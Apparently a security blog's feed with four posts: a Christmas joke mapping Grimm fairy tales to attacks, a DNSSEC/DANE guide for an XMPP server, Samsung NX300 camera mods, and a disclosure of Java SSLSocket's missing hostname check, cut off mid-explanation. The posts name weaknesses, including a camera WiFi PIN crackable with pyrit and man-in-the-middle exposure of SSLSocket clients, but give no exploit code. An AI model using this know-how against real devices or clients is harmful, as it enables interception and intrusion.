It is this time of the year again, and so we are proud to present a special revelation for Christmas!

The Brothers Grimm were not only academics, linguists, cultural researchers, lexicographers and authors, but also the world's first IT Security analysts. They wrote their so called fairy tales to document different kinds of security vulnerabilities, attacks and even some countermeasures. This article analyzes select examples and emphasizes the relevant lessons. Basic knowledge of the referenced stories is required to follow the analysis.

Rumpelstiltskin - A Badly Implemented Crypto Locker

Rumpelstiltskin, a typical script kiddie, lures the miller's daughter to install a crypto locker Trojan. Once she becomes the queen, the crypto locker makes her firstborn child inaccessible, providing a three-day unlock period.

Fortunately for the royal family, the implementation is flawed in two ways. Not only does it lack protection against brute force attacks, it also has a very weak password hard-coded into it.

The queen organizes for a massively parallel brute force attack, employing all of the kingdom's available system resources. Finally, she manages to guess the right password and is able to regain access to her firstborn.


  • Never install software from untrusted sources.
  • Do not use your username as your password.
  • Properly protect your system against brute-force attacks.

The Wolf and the Seven Young Goats - Outsourced Biometric Access Control Systems

The Big Bad Wolf is an obvious black-hat actor who wants to gain access to the goats' house. The mother goat, who needs to leave the home, has put into place a biometric access control system based on two factors: optical paw recognition and voice identification.

However, instead of deploying an implementation with known failure rate characteristics, she creates an insufficient requirements specification ("you will know him at once by his rough voice and his black feet.") and outsources the implementation to her kids, who do not have prior experience or formal education in the domain.

Besides of creating an implementation that uses too few biometric features to allow for a robust identification and authentication, the presented solution also exposes the exact cause of the authentication failure to the attacker ("[Our mother] has a soft, pleasant voice, but your voice is rough, you are the wolf." and "our mother has not black feet like you, you are the wolf."). This exposure of internal error causes allows the attacker to improve his approach and to succeed at the third attempt.


  • Take the time to properly specify security system requirements.
  • Do not outsource the development of mission-critical systems.
  • Only use biometrics as a supplementary mechanism to another access control system.
  • Do not expose internal error messages to potential attackers.
  • Properly protect your system against brute-force attacks.

Snow White - Social Media and Identity Theft

After hunting the young Snow White out of the family home, the queen stepmother is watching social media for signs of beautiful people (using a monitoring application called the "wonderful looking-glass"). She deploys a self-written face recognition algorithm that scans pictures tagged as #beautiful and returns a beauty index value (unfortunately, this detail is lost in the English translation. The German original reads "Aber Schneewittchen ist tausendmal schöner als Ihr." - "Snow White is a thousand times as beautiful as you are.").

Meanwhile Snow White, who is living in a safe house operated by the Seven Dwarfs charity organization, ignores the instructions to leave behind her social media presence, and posts geo-tagged selfies without properly scrubbing the metadata.

The queen's monitoring application notifies her of the newly analyzed pictures. Alerted by this, she obtains Snow White's geo-location from the pictures and performs a series of social engineering attacks. She uses stolen identity information from different sales representatives to successfully gain access to the safe house and to eventually poison Snow White.


  • Stop using your social media when going undercover, no matter how hard it is.
  • Social engineering is very effective, and in most cases it is not sufficient to teach employees about it. Additional safeguards like double checking are needed.

Sleeping Beauty - Exploiting an Off-by-One Remote Vulnerability

The kingdom in question has thirteen IT security experts (which due to the lack of better wording in 1857 were called "the wise women"). One of them was not invited to the release party, so instead she performs an unsolicited penetration test. During her testing, she creates a specially-crafted message ("The king's daughter shall in her fifteenth year prick herself with a spindle, and fall down dead.") that exploits an off-by-one vulnerability in the dining service implementation.

Initially, the message was designed to crash the newly-forked child thread, but due to sand-boxing and ASLR techniques deployed by the twelfth' wise woman, the whole application gets suspended into the interactive debugging console instead. This event triggers an automatic firewall rule temporarily blocking all external access to the application.

Due to the lack of a monitoring system, the production service is down for a noticeable time ("asleep for a hundred years"), but eventually, a rock-star developer is found and hired (the "king's son"). He is able to circumvent the firewall and to access the server console. From there, he reconstructs the stack and is able to continue application execution, and they live contented to the end of their days.


  • Bug bounties are a good way to focus curiosity and to learn about vulnerabilities.
  • Production services should be properly monitored to detect downtime.

Have a nice holiday season and a merry new year!

Comments on HN

Posted 2016-12-22 18:25:26

.IM top-level domain Domain Name System Security Extensions Look-aside Validation DNS-based Authentication of Named Entities Extensible Messaging and Presence Protocol TLSA ("TLSA" does not stand for anything; it is just the name of the RRtype) resource record.

Okay, seriously: this post is about securing an XMPP server running on an .IM domain with DNSSEC, using as a real-life example. In the world of HTTP there is HPKP, and browsers come with a long list of pre-pinned site certificates for the who's'who of the modern web. For XMPP, DNSSEC is the only viable way to extend the broken Root CA trust model with a slightly-less-broken hierarchical trust model from DNS (there is also TACK, which is impossible to deploy because it modifies the TLS protocol, and also unmaintained).

Because the .IM TLD is not DNSSEC-signed yet, we will need to use DLV (DNSSEC Look-aside Validation), an additional DNSSEC trust root operated by the ISC (until the end of 2016). Furthermore, we will need to set up the correct entries for (the XMPP service domain), (the conference domain) and (the actual server running the service).

This post has been sitting in the drafts folder for a while, but now that DANE-SRV has been promoted to Proposed Standard, it was a good time to finalize the article.


Our (real-life) scenario is as follows: the XMPP service is run on a server named (for historical reasons, the host is a web server forwarding to, not the actual XMPP server). The service furthermore hosts the conference service, which needs to be accessible from other XMPP servers as well.

In the following, we will create SRV DNS records to advertise the server name, obtain a TLS certificate, configure DNSSEC on both domains and create (signed) DANE records that define which certificate a client can expect when connecting.

Once this is deployed, state-level attackers will not be able to MitM users of the service simply by issuing rogue certificates, they would also have to compromise the DNSSEC chain of trust (in our case one of the following: ICANN/VeriSign, DLV, PIR or the registrar/NS hosting our domains, essentially limiting the number of states able to pull this off to one).

Creating SRV Records for XMPP

The service / server separation is made possible with the SRV record in DNS, which is a more generic variant of records like MX (e-mail server) or NS (domain name server) and defines which server is responsible for a given service on a given domain.

For XMPP, we create the following three SRV records to allow clients (_xmpp-client._tcp), servers (_xmpp-server._tcp) and conference participants (_xmpp-server._tcp on to connect to the right server:       IN SRV 5 1 5222       IN SRV 5 1 5269  IN SRV 5 1 5269

The record syntax is: priority (5), weight (1), port (5222 for clients, 5269 for servers) and host ( Priority and weight are used for load-balancing multiple servers, which we are not using.

Attention: some clients (or their respective DNS resolvers, often hidden in outdated, cheap, plastic junk routers provided by your "broadband" ISP) fail to resolve SRV records, and thus fall back to the A record. If you set up a new XMPP server, you will slightly improve your availability by ensuring that the A record ( in our case) points to the XMPP server as well. However, DNSSEC will be even more of a challenge for them, so lets write them off for now.

Obtaining a TLS Certificate for XMPP

While DANE allows rolling out self-signed certificates, our goal is to stay compatible with clients and servers that do not deploy DNSSEC yet. Therefore, we need a certificate issued by a trustworthy member of the Certificate Extorion ring. Currently, StartSSL and WoSign offer free certificates, and Let's Encrypt is about to launch.

Both StartSSL and WoSign offer a convenient function to generate your keypair. DO NOT USE THAT! Create your own keypair! This "feature" will allow the CA to decrypt your traffic (unless all your clients deploy PFS, which they don't) and only makes sense if the CA is operated by an Intelligence Agency.

What You Ask For...

The certificate we are about to obtain must be somehow tied to our XMPP service. We have three different names (, and and the obvious question is: which one should be entered into the certificate request.

Fortunately, this is easy to find out, as it is well-defined in the XMPP Core specification, section 13.7:

In a PKIX certificate to be presented by an XMPP server (i.e., a "server certificate"), the certificate SHOULD include one or more XMPP addresses (i.e., domainparts) associated with XMPP services hosted at the server. The rules and guidelines defined in [TLS‑CERTS] apply to XMPP server certificates, with the following XMPP-specific considerations:

  • Support for the DNS-ID identifier type [PKIX] is REQUIRED in XMPP client and server software implementations. Certification authorities that issue XMPP-specific certificates MUST support the DNS-ID identifier type. XMPP service providers SHOULD include the DNS-ID identifier type in certificate requests.

  • Support for the SRV-ID identifier type [PKIX‑SRV] is REQUIRED for XMPP client and server software implementations (for verification purposes XMPP client implementations need to support only the "_xmpp-client" service type, whereas XMPP server implementations need to support both the "_xmpp-client" and "_xmpp-server" service types). Certification authorities that issue XMPP-specific certificates SHOULD support the SRV-ID identifier type. XMPP service providers SHOULD include the SRV-ID identifier type in certificate requests.

  • [...]

Translated into English, our certificate SHOULD contain and according to [TLS-CERTS], which is "Representation and Verification of Domain-Based Application Service Identity within Internet Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of Transport Layer Security (TLS)", or for short RFC 6125. There, section 2.1 defines that there is the CN-ID (Common Name, which used to be the only entry identifying a certificate), one or more DNS-IDs (baseline entries usable for any services) and one or more SRV-IDs (service-specific entries, e.g. for XMPP). DNS-IDs and SRV-IDs are stored in the certificate as subject alternative names (SAN).

Following the above XMPP Core quote, a CA must add support adding a DNS-ID and should add an SRV-ID field to the certificate. Clients and servers must support both field types. The SRV-ID is constructed according to RFC 4985, section 2, where it is called SRVName:

The SRVName, if present, MUST contain a service name and a domain name in the following form:


For our XMPP scenario, we would need three SRV-IDs ( for clients, for servers, and for the conference service; all without the _tcp. part we had in the SRV record). In addition, the two DNS-IDs and are required recommended by the specification, allowing the certificate to be (ab)used for HTTPS as well.

Update: The quoted specifications allow to create an XMPP-only certificate based on SRV-IDs, that contains no DNS-IDs (and has a non-hostname CN). Such a certificate could be used to delegate XMPP operations to a third party, or to limit the impact of leaked private keys. However, you will have a hard time convincing a public CA to issue one, and once you get it, it will be refused by most clients due to lack of SRV-ID implementation.

And then there is one more thing. RFC 7673 proposes also checking the certificate for the SRV destination ( in our case) if the SRV record was properly validated, there is no associated TLSA record, and the application user was born under the Virgo zodiac sign.

Summarizing the different possible entries in our certificate, we get the following picture:

Name(s) Field Type Meaning or Common Name (CN) Legacy name for really old clients and servers.
DNS-IDs (SAN) Required entry telling us that the host serves anything on the two domain names.
SRV-IDs (SAN) Optional entry telling us that the host serves XMPP to clients and servers. SRV-ID (SAN) Optional entry telling us that the host serves XMPP to servers for DNS-ID or CN Optional entry if you can configure a DNSSEC-signed SRV record but not a TLSA record.

...and What You Actually Get

Most CAs have no way to define special field types. You provide a list of service/host names, the first one is set as the CN, and all of them are stored as DNS-ID SANs. However, StartSSL offers "XMPP Certificates", which look like they might do what we want above. Let's request one from them for and and see what we got:

openssl x509 -noout -text -in yaxim.crt
Subject: description=mjp74P5w0cpIUITY, C=DE,
X509v3 Subject Alternative Name:,, othername:<unsupported>,
    othername:<unsupported>, othername:<unsupported>, othername:<unsupported>

So it's othername:<unsupported>, then? Thank you OpenSSL, for your openness! From RFC 4985 we know that "othername" is the basic type of the SRV-ID SAN, so it looks like we got something more or less correct. Using this script (highlighted source, thanks Zash), we can further analyze what we've got:

  X509v3 Subject Alternative Name:

Alright, the two service names we submitted turned out under three different field types:

  • SRV-ID (it's mising the _xmpp-client. / _xmpp-server. part and is thus invalid)
  • xmppAddr (this was the correct entry type in the deprecated RFC 3920 XMPP specification, but is now only allowed in client certificates)
  • DNS-ID (wow, these ones happen to be correct!)

While this is not quite what we wanted, it is sufficient to allow a correctly implemented client to connect to our server, without raising certificate errors.

Configuring DNSSEC for Your Domain(s)

In the next step, the domain (in our case both and, but the following examples will only list needs to be signed with DNSSEC. Because I'm a lazy guy, I'm using BIND 9.9, which does inline-signing (all I need to do is create some keys and enable the feature).

Key Creation with BIND 9.9

For each domain, a zone signing key (ZSK) is needed to sign the individual records. Furthermore, a key signing key (KSK) should be created to sign the ZSK. This allows you to rotate the ZSK as often as you wish.

# create key directory
mkdir /etc/bind/keys
cd /etc/bind/keys
# create key signing key
dnssec-keygen -f KSK -3 -a RSASHA256 -b 2048
# create zone signing key
dnssec-keygen -3 -a RSASHA256 -b 2048
# make all keys readable by BIND
chown -R bind.bind .

To enable it, you need to configure the key directory, inline signing and automatic re-signing:

zone "" {
    key-directory "/etc/bind/keys";
    inline-signing yes;
    auto-dnssec maintain;

After reloading the config, the keys need to be enabled in BIND:

# load keys and check if they are enabled
$ rndc loadkeys
$ rndc signing -list
Done signing with key 17389/RSASHA256
Done signing with key 24870/RSASHA256

The above steps need to be performed for as well.

NSEC3 Against Zone Walking

Finally, we also want to enable NSEC3 to prevent curious people from "walking the zone", i.e. retrieving a full list of all host names under our domains. To accomplish that, we need to specify some parameters for hashing names. These parameters will be published in an NSEC3PARAMS record, which resolvers can use to apply the same hashing mechanism as we do.

First, the hash function to be used. RFC 5155, section 4.1 tells us that...

"The acceptable values are the same as the corresponding field in the NSEC3 RR."

NSEC3 is also defined in RFC 5155, albeit in section 3.1.1. There, we learn that...

"The values for this field are defined in the NSEC3 hash algorithm registry defined in Section 11."

It's right there... at the end of the section:

Finally, this document creates a new IANA registry for NSEC3 hash algorithms. This registry is named "DNSSEC NSEC3 Hash Algorithms". The initial contents of this registry are:

0 is Reserved.

1 is SHA-1.

2-255 Available for assignment.

Let's pick 1 from this plethora of choices, then.

The second parameter is "Flags", which is also defined in Section 11, and must be 0 for now (other values have to be defined yet).

The third parameter is the number of iterations for the hash function. For a 2048 bit key, it MUST NOT exceed 500. Bind defaults to 10, Strotman references 330 from RFC 4641bis, but it seems that number was removed since then. We take this number anyway.

The last parameter is a salt for the hash function (a random hexadecimal string, we use 8 bytes). You should not copy the value from another domain to prevent rainbow attacks, but there is no need to make this very secret.

$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"')
$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"')

Whenever you update the NSEC3PARAM value, your zone will be re-signed and re-published. That means you can change the iteration count and salt value later on, if the need should arise.

Configuring the DS (Delegation Signer) Record for

If your domain is on an already-signed TLD (like on .org), you need to establish a trust link from the .org zone to your domain's signature keys (the KSK, to be precise). For this purpose, the delegation signer (DS) record type has been created.

A DS record is a signed record in the parent domain (.org) that identifies a valid key for a given sub-domain ( Multiple DS records can coexist to allow key rollover. If you are running an important service, you should create a second KSK, store it in a safe place, and add its DS in addition to the currently used one. Should your primary name server go up in flames, you can recover without waiting for the domain registrar to update your records.

Exporting the DS Record

To obtain the DS record, BIND comes with the dnssec-dsfromkey tool. Just pipe all your keys into it, and it will output DS records for the KSKs. We do not want SHA-1 records any more, so we pass -2 as well to get the SHA-256 record:

$ dig @ DNSKEY | dnssec-dsfromkey -f - -2 IN DS 42199 8 2 35E4E171FC21C6637A39EBAF0B2E6C0A3FE92E3D2C983281649D9F4AE3A42533

This line is what you need to submit to your domain registrar (using their web interface or by means of a support ticket). The information contained is:

  • key tag: 42199 (this is just a numeric ID for the key, useful for key rollovers)
  • signature algorithm: 8 (RSA / SHA-256)
  • DS digest type: 2 (SHA-256)
  • hash value: 35E4E171...E3A42533

However, some registrars insist on creating the DS record themselves, and require you to send in your DNSKEY. We only need to give them the KSK (type 257), so we filter the output accordingly:

$ dig @ DNSKEY | grep 257              86400   IN      DNSKEY  257 3 8

Validation of the Trust Chain

As soon as the record is updated, you can check the trustworthiness of your domain. Unfortunately, all of the available command-line tools suck. One of the least-sucking ones is drill from ldns. It still needs a root.key file that contains the officially trusted DNSSEC key for the . (root) domain. In Debian, the dns-root-data package places it under /usr/share/dns/root.key. Let's drill our domain name with DNSSEC (-D), tracing from the root zone (-T), quietly (-Q):

$ drill -DTQ -k /usr/share/dns/root.key
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] org. 86400 IN DS 21366 7 1 e6c1716cfb6bdc84e84ce1ab5510dac69173b5b2 
org. 86400 IN DS 21366 7 2 96eeb2ffd9b00cd4694e78278b5efdab0a80446567b69f634da078f0d90f01ba 
;; Domain: org.
[T] org. 900 IN DNSKEY 257 3 7 ;{id = 9795 (ksk), size = 2048b}
org. 900 IN DNSKEY 256 3 7 ;{id = 56198 (zsk), size = 1024b}
org. 900 IN DNSKEY 256 3 7 ;{id = 34023 (zsk), size = 1024b}
org. 900 IN DNSKEY 257 3 7 ;{id = 21366 (ksk), size = 2048b}
[T] 86400 IN DS 42199 8 2 35e4e171fc21c6637a39ebaf0b2e6c0a3fe92e3d2c983281649d9f4ae3a42533 
;; Domain:
[T] 86400 IN DNSKEY 257 3 8 ;{id = 42199 (ksk), size = 2048b} 86400 IN DNSKEY 256 3 8 ;{id = 6384 (zsk), size = 2048b}
[T]  3600    IN  A
;;[S] self sig OK; [B] bogus; [T] trusted

The above output traces from the initially trusted . key to org, then to and determines that is properly DNSSEC-signed and therefore trusted ([T]). This is already a big step, but the tool lacks some color, and it does not allow to explicitly query the domain's name servers (unless they are open resolvers), so you can't test your config prior to going live.

To get a better view of our DNSSEC situation, we can query some online services:

Ironically, neither DNSViz nor Verisign support encrypted connections via HTTPS, and Lutz' livetest is using an untrusted root.

Enabling DNSSEC Look-aside Validation for

Unfortunately, we can not do the same with our short and shiny domain. If we try to drill it, we get the following:

$ drill -DTQ -k /usr/share/dns/root.key
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] Existence denied: im. DS
;; Domain: im.
;; No DNSKEY record found for im.
;; No DS for;; Domain:
[S] 86400 IN DNSKEY 257 3 8 ;{id = 17389 (ksk), size = 2048b} 86400 IN DNSKEY 256 3 8 ;{id = 24870 (zsk), size = 2048b}
[S] 3600    IN  A
;;[S] self sig OK; [B] bogus; [T] trusted

There are two pieces of relevant information here:

  • [T] Existence denied: im. DS - the top-level zone assures that .IM is not DNSSEC-signed (it has no DS record).
  • [S] 3600 IN A - is self-signed, providing no way to check its authenticity.

The .IM top-level domain for Isle of Man is operated by Domicilium. A friendly support request reveals the following:

Unfortunately there is no ETA for DNSSEC support at this time.

That means there is no way to create a chain of trust from the root zone to

Fortunately, the desingers of DNSSEC anticipated this problem. To accelerate adoption of DNSSEC by second-level domains, the concept of look-aside validation was introduced in 2006. It allows to use an alternative trust root if the hierarchical chaining is not possible. The ISC is even operating such an alternative trust root. All we need to do is to register our domain with them, and add them to our resolvers (because they aren't added by default).

After registering with DLV, we are asked to add our domain with its respective KSK domain key entry. To prove domain and key ownership, we must further create a signed TXT record under with a specific value: IN TXT "DLV:1:fcvnnskwirut"

Afterwards, we request DLV to check our domain. It queries all of the domains' DNS servers for the relevant information and compares the results. Unfortunately, our domain fails the check:

FAILURE has extra: 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE has extra: 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE missing: YAX.IM. 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE missing: YAX.IM. 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE This means your DNS servers are out of sync. Either wait until the DNSKEY data is the same, or fix your server's contents.

This looks like a combination of two different issues:

  1. A part of our name servers is returning YAX.IM when asked for
  2. The DLV script is case-sensitive when it comes to domains.

Problem #1 is officially not a problem. DNS is case-insensitive, and therefore all clients that fail to accept YAX.IM answers to requests are broken. In practice, this hits not only the DLV resolver (problem #2), but also the resolver code in Erlang, which is used in the widely-deployed ejabberd XMPP server.

While we can't fix all the broken servers out there, #2 has been reported and fixed, and hopefully the fix has been rolled out to production already. Still, issue #1 needs to be solved.

It turns out that it is caused by case insensitive response compression. You can't make this stuff up! Fortunately, BIND 9.9.6 added the no-case-compress ACL, so "all you need to do" is to upgrade BIND and enable that shiny new feature.

After checking and re-checking the TXT record with DLV, there is finally progress:

SUCCESS DNSKEY signatures validated.
SUCCESS COOKIE: Good signature on TXT response from <NS IP>
SUCCESS <NS IP> has authentication cookie DLV:1:fcvnnskwirut

After your domain got validated, it will receive its look-aside validation records under

$ dig +noall +answer DLV 3451    IN  DLV 17389 8 2 C41AFEB57D71C5DB157BBA5CB7212807AB2CEE562356E9F4EF4EACC2 C4E69578 3451    IN  DLV 17389 8 1 8BA3751D202EF8EE9CE2005FAF159031C5CAB68A

This looks like a real success. Except that nobody is using DLV in their resolvers by default, and DLV will stop operations in 2017.

Until then, you can enable look-aside validation in your BIND and Unbound resolvers.

Lutz' livetest service supports checking DLV-backed domains as well, so let's verify our configuration:

Creating TLSA Records for HTTP and SRV

Now that we have created keys, signed our zones and established trust into them from the root (more or less), we can put more sensitive information into DNS, and our users can verify that it was actually added by us (or one of at most two or three governments: the US, the TLD holder, and where your nameservers are hosted).

This allows us to add a second, independent, trust root to the TLS certificates we use for our web server ( as well as for our XMPP server, by means of TLSA records.

These record types are defined in RFC 6698 and consist of the following pieces of information:

  • domain name (i.e.
  • certificate usage (is it a CA or a server certificate, is it signed by a "trusted" Root CA?)
  • selector + matching type + certificate association data (the actual certificate reference, encoded in one of multiple possible forms)

Domain Name

The domain name is the hostname in the case of HTTPS, but it's slightly more complicated for the XMPP SRV record, because there we have the service domain (, the conference domain ( and the actual server domain name (

The behavior for SRV TLSA handling is defined in RFC 7673, published as Proposed Standard in October 2015. First, the client must validate that the SRV response for the service domain is properly DNSSEC-signed. Only then the client can trust that the server named in the SRV record is actually responsible for the service.

In the next step, the client must ensure that the address response (A for IPv4 and AAAA for IPv6) is DNSSEC-signed as well, or fall back to the next SRV record.

If both the SRV and the A/AAAA records are properly signed, the client must do a TLSA lookup for the SRV target (which is for our client users, or for other XMPP servers connecting to us).

Certificate Usage

The certificate usage field can take one of four possible values. Translated into English, the possibilities are:

  1. "trusted" CA - the provided cert is a CA cert that is trusted by the client, and the server certificate must be signed by this CA. We could use this to indicate that our server only will use StartSSL-issued certificates.
  2. "trusted" server certificate - the provided cert corresponds to the certificate returned over TLS und must be signed by a trusted Root CA. We will use this to deliver our server certificate.
  3. "untrusted" CA - the provided CA certificate must be the one used to sign the server's certificate. We could roll out a private CA and use this type, but it would cause issues with non-DNSSEC clients.
  4. "untrusted" server certificate - the provided certificate must be the same as returned by the server, and no Root CA trust checks shall be performed.

The Actual Certificate Association

Now that we know the server name for which the certificate is valid and the type of certificate and trust checks to perform, we need to store the actual certificate reference. Three fields are used to encode the certificate reference.

The selector defines whether the full certificate (0) or only the SubjectPublicKeyInfo field (1) is referenced. The latter allows to get the server key re-signed by a different CA without changing the TLSA records. The former could be theoretically used to put the full certificate into DNS (a rather bad idea for TLS, but might be interesting for S/MIME certs).

The matching type field defines how the "selected" data (certificate or SubjectPublicKeyInfo) is stored:

  1. exact match of the whole "selected" data
  2. SHA-256 hash of the "selected" data
  3. SHA-512 hash of the "selected" data

Finally, the certificate association data is the certificate/SubjectPublicKeyInfo data or hash, as described by the previous fields.

Putting it all Together

A good configuration for our service is a record based on a CA-issued server certificate (certificate usage 1), with the full certificate (selector 0) hashed via SHA-256 (matching type 0). We can obtain the required association data using OpenSSL command line tools:

openssl x509 -in -outform DER | openssl sha256
(stdin)= bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9

Taken together, this results in the following entries for HTTPS on and     IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9 IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9

This is also the SHA-256 fingerprint you can see in your web browser.

For the XMPP part, we need to add TLSA records for the SRV targets ( for clients and for servers). There should be no need to make TLSA records for the service domain (, because a modern client will always try to resolve SRV records, and no DNSSEC validation will be possible if that fails.

Here, we take the SHA-256 sum of the certificate we obtained from StartSSL, and create two records with the same type and format as above: IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836 IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836

These fields will be used by DNSSEC-enabled clients to verify the TLS certificate presented by our XMPP service.

Replacing the Server Certificate

Now that the TLSA records are in place, it is not as easy to replace your server certificate as it was before, because the old one is now anchored in DNS.

You need to perform the following steps in order to ensure that all clients will be able to connect at any time:

  1. Obtain the new certificate
  2. Create a second set of TLSA records, for the new certificate (keep the old one in place)
  3. Wait for the configured DNS time-to-live to ensure that all users have received both sets of TLSA records
  4. Replace the old certificate on the server with the new one
  5. Remove the old TLSA records

If you fail to add the TLSA records and wait the DNS TTL, some clients will have cached a copy of only the old TLSA records, so they will reject your new server certificate.


DANE for XMPP is a chicken-and-egg problem. As long as there are no servers, it will not be implemented in the clients, and vice versa. However, the (currently unavailable) XMPP security analyzer is checking the DANE validation status, and GSoC 2015 brought us DNSSEC support in minidns, which soon will be leveraged in Smack-based XMPP clients.

With this (rather long) post covering all the steps of a successful DNSSEC implementation, including the special challenges of .IM domains, I hope to pave the way for more XMPP server operators to follow.

Enabling DNSSEC and DANE provides an improvement over the rather broken Root CA trust model, however it is not without controversy. tptacek makes strong arguments against DNSSEC, because it is using outdated crypto and because it doesn't completely solve the government-level MitM problem. Unfortunately, his proposal to "do nothing" will not improve the situation, and the only positive contribution ("use TACK!") has expired in 2013.

Finally, one last technical issue not covered by this post is periodic key rollover; this will be covered by a separate post eventually.

Comments on HN

Posted 2015-10-16 17:55:42 Tags:

This is the third post in a series covering the Samsung NX300 "Smart" Camera. In the first post, we have analyzed how the camera is interacting with the outside world using NFC and WiFi. The second one showed a method to gain a remote root shell, and it spawned a number of interesting projects. This post is a reference collection of these projects, and a call for collaboration.

Samsung NX300 Firmware Update

First, I want to thank Samsung for fixing the most serious security problems in the NX300 firmware. As of firmware version 1.41, the X server is closed down and there is an option to encrypt the WiFi network spawned by the camera with WPA2:

1.Add Wi-Fi Privacy Lock function
2.Revision Open Source Licenses

Unfortunately, the provided 8-digit PIN can be cracked in less than one hour using pyrit on a middle-class GPU. While this is far from good security, it requires at least some dedication from the attacker.

Even more unfortunately, Samsung removed execution from the NX300M firmware starting with (or after) 1.11. Dear Samsung engineers, if you are reading this: please add it back! Executing code from the SD card (without modifying the firmware image) is a great opportunity, not a security problem! Most of the mods discussed in this post are leveraging that functionality in a creative way!

Automatic Photo Backups

Markus A. Kuppe has written a tutorial for auto-backups of the NX300 using an ftp client on the camera and a Raspberry Pi ftp server. One interesting bit of information is how to make the camera auto-connect to WiFi whenever it is turned on, using a custom wpa_supplicant.conf and DBus:

cp /mnt/mmc/wpa_supplicant.conf /tmp/
/usr/bin/ start NL 0x8210
/usr/sbin/connmand -W nl80211 -r
sleep 2
dbus-send --system --type=method_call --print-reply --dest=net.connman \
    /net/connman/service/wifi_a0219572b25b_7777772e6c656d6d737465722e6465_managed_psk \

Jonathan Dieter created another backup mechanism using SCP and published the nx300m-autobackup source code. Well done!

Additional Kernel Modules

Markus also provided a short write-up on compiling additional kernel modules, which should allow us to extend the camera's functionality without re-flashing the firmware.

Crypto Photography

The most interesting idea, however, was envisioned by Doug Hickok. He modified the firmware to auto-encrypt photographs using public key cryptography. This allows for very interesting use cases like letting a professional photographer take pictures without allowing him to keep a copy, or for investigative journalists to hide their data tracks.

In the current implementation the pictures are first stored to the SD card and then encrypted and deleted, allowing for undelete attacks. Do not use it in production yet. With some more tweaking, however, it should be possible to make this firmware actually deliver the security promise.

Announcement: Samsung NX Hacks

Seeing how there is a (yet small) community of tinkerers around the NX300 camera, and with the knowledge that a whole range of Samsung NX cameras comes with Tizen-based firmware (NX1, NX200, NX2000, NX300M, ...?), the author has created a repository and a Wiki on GitHub.

Feel free to contribute to the wiki or the project - every input is welcome, starting from transferring information from the blog posts linked above into a more structured form in the wiki, and up to creating firmware modifications to allow for exciting new features.

Hack on!

Full series:

Posted 2015-01-29 17:30:20 Tags:

Internet security is hard. TLS is almost impossible. Implementing TLS correctly in Java is Nightmare! While the higher-level HttpsURLConnection and Apache's DefaultHttpClient do it (mostly) right, direct users of Java SSL sockets (SSLSocket/ SSLEngine, SSLSocketFactory) are left exposed to Man-in-the-Middle attacks, unless the application manually checks the hostname against the certificate or employs certificate pinning.

The SSLSocket documentation claims that the socket provides "Integrity Protection", "Authentication", and "Confidentiality", even against active wiretappers. That impression is underscored by rigorous certificate checking performed when connecting, making it ridiculously hard to run development/test installations. However, these checks turn out to be completely worthless against active MitM attackers, because SSLSocket will happily accept any valid certificate (like for a domain owned by the attacker). Due to this, many applications using SSLSocket can be attacked with little effort.

This problem has been written about, but CVE-2014-5075 shows that it can not be stressed enough.

Affected Applications

This problem affects applications that make use of SSL/TLS, but not HTTPS. The best candidates to look for it are therefore clients for application-level protocols like e-mail (POP3/IMAP), instant messaging (XMPP), file transfer (FTP). CVE-2014-5075 is the respective vulnerability of the Smack XMPP client library, so this is a good starting point.

XMPP Clients

XMPP clients based on Smack (which was fixed on 2014-07-22):

Other XMPP clients:

Not Vulnerable Applications

The following applications have been checked as well, and contained code to compensate for SSLSockets shortcomings:

  • Jitsi (OSS conferencing client)
  • K9-Mail (Android e-Mail client)
  • Xabber (Based on Smack, but using its own hostname verification)

Background: Security APIs in Java

The amount of vulnerable applications can be easily explained after a deep dive into the security APIs provided by Java (and its offsprings). Therefore, this section will handle the dirty details of trust (mis)management in the most important implementations: old Java, new Java, Android and in Apache's HttpClient.

Java SE up to and including 1.6

When network security was added into Java 1.4 with the JSSE (and we all know how well security-as-an-afterthought works), two distinct APIs have been created for certificate verification and for hostname verification. The rationale for that decision was probably that the TLS/SSL handshake happens at the socket layer, whereas the hostname verification depends on the application-level protocol (HTTPS at that time). Therefore, the X509TrustManager class for certificate trust checks was integrated into the low-level SSLSocket and SSLEngine classes, whereas the HostnameVerifier API was only incorporated into the HttpsURLConnection.

The API design was not very future-proof either: X509TrustManager's checkClientTrusted() and checkServerTrusted() methods are only passed the certificate and authentication type parameters. There is no reference to the actual SSL connection or its peer name. The only workaround to allow hostname verification through this API is by creating a custom TrustManager for each connection, and storing the peer's hostname in it. This is neither elegant nor does it scale well with multiple connections.

The HostnameVerifier on the other hand has access to both the hostname and the session, making a full verification possible. However, only HttpsURLConnection is making use of a HostnameVerifier (and is only asking it if it determines a mismatch between the peer and its certificate, so the default HostnameVerifier always fails).

Besides of the default HostnameVerifier being unusable due to always failing, the API has another subtle surprise: while the TrustManager methods fail by throwing a CertificateException, HostnameVerifier.verify() simply returns false if verification fails.

